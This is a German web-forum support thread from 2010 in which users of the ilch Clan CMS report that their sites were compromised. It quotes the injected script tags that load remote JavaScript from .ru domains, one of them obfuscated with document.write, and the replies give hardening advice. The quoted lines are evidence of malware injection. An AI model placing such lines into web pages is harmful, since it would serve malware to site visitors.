Hallo,
seit einigen Tagen bekommen wir und unsere Gäste ne Virenmeldung wenn unsere Seite aufgerufen wird.
Meldung von AntiVir:
...\Lokale Einstellungen\Anwendungsdaten\Opera\Opera\cache\opr0I6GR'
wurde ein Virus oder unerwünschtes Programm 'HTML/Malicious.PDF.Gen
Nun habe ich mir mal die index.html angeschaut und folgendes gefunden:
<script type="text/javascript" src="http://tindad.ru/Hard_Copy.js"></script>
<03b22c85f6006d2ed5e71c8af36f3c48-->
Dies war ganz am Ende des Scriptes.
Dann habe ich die ganze Seite nach Textinhalten " .ru " dursuchen lassen
und in folgenden ".js" Dateien habe ich den Eintrag:
document.write('<sc'+'ript type="text/javascript" src="http://greatrow.ru/Hard_Copy.js"></scri'+'pt>');
gefunden:
bbcode
BBCodeGlobal
editor
interface
JSCookMenu
regist
search
xajax_debug
xajax_lang_de
xajax_legacy
xajax_verbose
theme
deutsch
whizzywig
(alles .js)
Nun habe ich diese .ru links gelöscht und hoffe nun dass alles wieder ok ist. Im moment siehts so aus.
Dennoch, wie ist das Möglich?
und was kann ich tun dass das nicht wieder vorkommt?
Gruß Knocker
verwendete ilchClan Version: 1.1 N
betroffene Homepage: externer Link
Beitrag zur Merkliste hinzufügen
Hier kann eine Notiz zum Merk-Eintrag hinzugefügt werden (optional)
ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » VIRUS
| Geschlossen | ||
-
Mi. 29.09.2010
14:42 Uhr
#1
- Registriert seit
- 02.02.2010
- Beiträge
- 21
- Beitragswertungen
-
Mi. 29.09.2010
15:48 Uhr
#2
- Registriert seit
- 21.03.2007
- Beiträge
- 7.643
- Beitragswertungen
- Sämtliche Passwörter ändern!
- Nur Passwörter an Personen des Vertrauens heraus geben
- Sichere Passwörter verwenden
- Schreibrechte von Ordnern & Dateien prüfen
- geprüfte Scripte/Module verwenden
- akutelles Update verwenden -
Mi. 29.09.2010
17:04 Uhr
#3
- Registriert seit
- 02.02.2010
- Beiträge
- 21
- Beitragswertungen
Danke Dir,
ein paar fragen noch:
Passwörter ändern, gilt das auch für die Benutzer mit Admin rechten auf der HP?
und zuletzt
kann ich das Update einfach rüberspielen oder wie funzt das?
nicht dass meine Änderungen die ich gemacht habe anschließend weg sin.
Gruß Knocker -
Mi. 29.09.2010
17:52 Uhr
#4
- Registriert seit
- 21.03.2007
- Beiträge
- 7.643
- Beitragswertungen
Update von deiner verwendeten Version Schritt für Schritt bis zur aktuellen Version! Die Gefahr, dass sich etwas verändert ist immer! Im Besonderen bei speziell angepassten Dateien!
www.ilch.de/texts-s53-wie-fhre-ich-ein-update-durch.html
Zu den Passwörtern, sag ich jetzt einmal ja, es kommt zwar immer darauf an was für Möglichkeiten des Uploads oder Scriptveränderungen durch den User möglich sind, aber grundsätzlich sollten Personen mit besonderen Zugriffsrechten auch sichere Passwörter verwenden! -
Mi. 29.09.2010
19:12 Uhr
#5
- Registriert seit
- 02.02.2010
- Beiträge
- 21
- Beitragswertungen
OK Super, danke Dir -
Do. 30.09.2010
07:50 Uhr
#6
- Registriert seit
- 02.02.2010
- Beiträge
- 21
- Beitragswertungen
Einen guten Morgen,
Lord Schirmer, kannst Du
oder jemand anders mir bitte nochmals helfen?
Ich weiß jetzt nicht ob das was mit dem oberen Thema zu tun hat, aber,
zum einen
1. funzt mein Newsletter nicht mehr.
Wenn ich eine neue PN darüber verschicken will und ich im Admin Bereich den Newsletter anklicke kommt immer:
Error: the xajax Javascript component could not be included.
Perhaps the URL is incorrect?
URL: include/includes/xajax_js/xajax_core.js
Diese xajax_core.js ist in dem Pfad hat aber ne Größe von 12.856
Die gleiche Datei von einem Backup ist aber 35.533 Groß ???
Auch habe ich die vom Backup mal rüberkopiert, funzt aber auch nicht.
und
2. Bei Eigene Box / Page habe ich kein Eingabefeld mehr?
Ich befürchte dass vielleicht noch andere sachen ausm Admin Berreich kaputt sind, jedoch habe ich bis jetzt noch keine weiteren Fehler entdeckt.
Gruß Knocker -
Do. 30.09.2010
10:27 Uhr
#7
- Registriert seit
- 21.10.2007
- Beiträge
- 5.951
- Beitragswertungen
An deiner Stelle würde ich das Backup auf user und forenposts begrenzen, und die ganze Seite neu machen.Spamming, sinnlose Beiträge, Pushing, Doppelposting und Werbung sind verboten
externer Link -
Do. 30.09.2010
16:54 Uhr
#8
- Registriert seit
- 02.02.2010
- Beiträge
- 21
- Beitragswertungen
Zitat geschrieben von Chapter
Gibts nicht die Möglichkeit die 2 sachen wieder herzustellen? -
Do. 30.09.2010
16:59 Uhr
#9
- Registriert seit
- 21.03.2007
- Beiträge
- 7.643
- Beitragswertungen
-
Fr. 01.10.2010
08:48 Uhr
#10
- Registriert seit
- 02.02.2010
- Beiträge
- 21
- Beitragswertungen
Ja danke,
hab Dir geantwortet. -
Hey,
hatte am 29.09.2010 ähnliche Attacke auf meinen Webserver, bei mir wurden an alle htm und html Dateien ein <skript> angehängt was einen Trojaner installiert.
Komisch ist nur:
1. Ich habe die aktuelle Version von Ilch.
2. Keine neuen Benutzer können sich ohne Zustimmung regestrieren
3. Kenne alle jetzigen Benutzer persönlich kennt sich keiner sogut damit aus das er sowas machen könnte bzw haben gar nicht so viele Rechte gehabt und kann auch keiner russisch.
4. Nicht grad leichtes Passwort vom Adminaccount
Könnte mir aber das ganze via XSS Attacke über die Kommentar-Funktion vorstellen. Indem dann eine modifizierte Version einer C??.php oder so eingeschleust wird und die Auswirkungen bei mir sprechen fast für so eine Shell.
Vielleicht kann mir das irgendwer erklären hab das ganze auch schon in ein Russen Forum zurück verfolgt die haben da über den Code diskutiert also wenn irgendwer paar infos will oder mir dazu was sagen kann nur her damit ich lass meine Seite aber jetzt erstmal down.
Bis ich da mehr weiss hab auch scho mit dem SP von meinem Webserver gesprochen die werden den übers WE mal neu aufsetzen da die <skript> auch in den nicht löschbaren ERR_Docs eingebaut war.
Grüße
LoW
| Geschlossen | ||
 |
Zurück zu Fehlersuche und Probleme | |
Optionen: Bei einer Antwort zu diesem Thema eine eMail erhalten